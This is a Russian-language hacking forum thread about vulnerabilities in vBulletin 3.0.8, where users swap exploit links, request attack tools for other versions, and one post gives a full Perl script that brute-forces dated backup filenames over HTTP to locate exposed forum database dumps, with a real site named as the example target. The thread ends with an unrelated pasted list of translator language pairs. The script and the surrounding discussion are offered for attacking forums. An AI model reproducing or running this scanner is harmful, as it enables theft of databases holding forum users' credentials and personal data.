Вопрос по уязвимостям в форуме vBulletin v.3.0.8

Есть ли уязвимости в этом форуме???

 

:::::::::::::Есть ли уязвимости в этом форуме???:::::::::::::::::::
Ну ты и приколист . Он недавно только вышел. Везде есть уязвимости...

 

Ээээ...блин, дайте норм ссылки на скачь Булки 3,0,7 и руссификацию, если не сложно))

 

http://vbulletin.net.ru/

 

Ммм...а руссификации на 3,0,8 ни у кого не завалялось, а то я на том сайте не нашел...

 

vBulletin <= 3.0.8 Accessible Database Backup Searcher (code fixes)
http://www.milw0rm.com/id.php?id=1189

 

x_Lex, ты уже тестил?
4то можно с этого сплойта поиметь(ато щас сижу на та4ке, где не могу скомпилить)?

 

ничего толкового, если юзер сохранил бэкап и оставил его в папке форума, то можно его стяуть, сплоит просто проверяет наличие данных файлов, не более.

 

ясно, о4ередной сплойт из серии "русская рулетка"

 

da privatnie 100 pudova imeutsa, ne takoi on i bezbagni

 

дк мы это и говорим что багов какраз-таки в новых версиях всегда полно, вот только их найти осталось, а сплойты, ну че сплойты, как купишь, со мной поделишься,

 

Интересует, есть ли сплоиты или другие средства взлома для vBulletin 3.0.0 Beta 7 ?
Отпишите плиз. Очень надо.

 

есть сплойт для <3.0.4, но опять же из серии "дабы-если бы-кабы"

 

наскока я помню начиная с 3,0,7 в булках ведется какоето хитрое шифрование, какое именно я не помню. (может быть похоже с ipb 2.0.4)

 

Можешь скинуть сплоит этот? Для подробного разбора как говориться... %)
если не трудно на [email protected]

 

Шифрование 4его? если ты про пасы юзверей, то там юзается двойное хеширование с солью, а нас4ет какого-нить шифрование я ни4его пока не слышал...

 

сей4ас я не дома....скину ближе к выходным (отпиши в ли4ку)...

 

Exploit Vbulletin 3.0.8 (backup.php) in perl

Code:

#!/usr/bin/perl
###########################################
# C R O U Z . C O M S E C U R I T Y T E A M #
###########################################
# EXPLOIT FOR: vBULLETIN All Versions Forums Backup Detector #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirius) #
#Email: [email protected] #
# #
#This Vuln Credited By M@FIA From Crouz Security Team #
# #
# Reference: http://securitytracker.com/alerts/2005/Aug/1014805.html #
# #
###########################################
#GR33tz T0 => mh_p0rtal -- Dr-ChephaleX -- The-CepheXin -- Djay_Agoustinno #
# Autumn_Love6 -- Behzad185 -- No_Face_King -- M@FIA # #
# #
# IRANIAN HACKERS AND RESEARCHERS #
# Special Lamerz : Shabgard & Emperor (Two Arabic Lamerz) #
# #
###########################################



use IO::Socket;

if (@ARGV < 2)
{
print "\n===========================\n";
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
print " Crouz Security Team \n\n";
print " Usage: <Target> <DIR>\n\n";
print "===========================\n\n";
print "Examples:\n\n";
print " VbulletinBU.pl www.shabgard.org /Forums/\n\n";
print "You Can Add The Forum Backup Folder \n(It's Default in Forum's Root Directory) \n Example : VbulletinBU.pl www.shabgard.org /Forums/include/ /Alpha Programmer\n\n";

exit();
}

my $host = $ARGV[0];
my $DIR = $ARGV[1];


@Alpha = ('0' , '1' , '2' , '3' , '4' ,'5' , '6' , '7' , '8' , '9' );

foreach $licht0 ( @Alpha ) {
foreach $licht1 ( @Alpha ) {
foreach $licht2 ( @Alpha ) {
foreach $licht3 ( @Alpha ) {
foreach $licht4 ( @Alpha ) {
$crouz = $licht1.$licht2;
$crouz2 = $licht3.$licht4;
$crouz3 = "200";
$crouz3 .= $licht0;

if ($crouz >= 31 ) {
goto LightDoor;
}

if ($crouz2 > 12 ) {
goto LightDoor;
}

if ($crouz3 > 2005 ) {
goto LightDoor;
}

print "forumbackup-$crouz-$crouz2-$crouz3.sql\n";
$Sirius = "forumbackup-$crouz2-$crouz-$crouz3.sql";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

$http = "HEAD $DIR$Sirius HTTP/1.0\n";
$http .= "Host: $host\n\r\n\r";
print "\n";
print $remote $http;
sleep(1);

while ($sirus=<$remote>)
{
if($sirus =~ "200 OK") {
print "$sirus";
print "Nice ... You Found The BackUp Of VBulletin Forum , See This URL :\n";
print "$host$DIR$Sirius\n\n";
goto start;
}
}
}
LightDoor:
}
}
}
}

start:

#EoF

enjOY néM3S!s

 

Итересно... У меня идет строчки типа forumbackup-00-01-2000.sql А где они должны быть?

 

http://www.online-translator.com/text.asp?lang=en

English-Russian
Russian-English
German-Russian
Russian-German
French-Russian
Russian-French
Italian-Russian
Spanish-Russian
Russian-Spanish
English-German
German-English
English-French
French-English
French-German
English-Spanish
Spanish-English
French-Spanish
Spanish-French
English-Portuguese
Portuguese-English

http://www.online-translator.com/text.asp?lang=en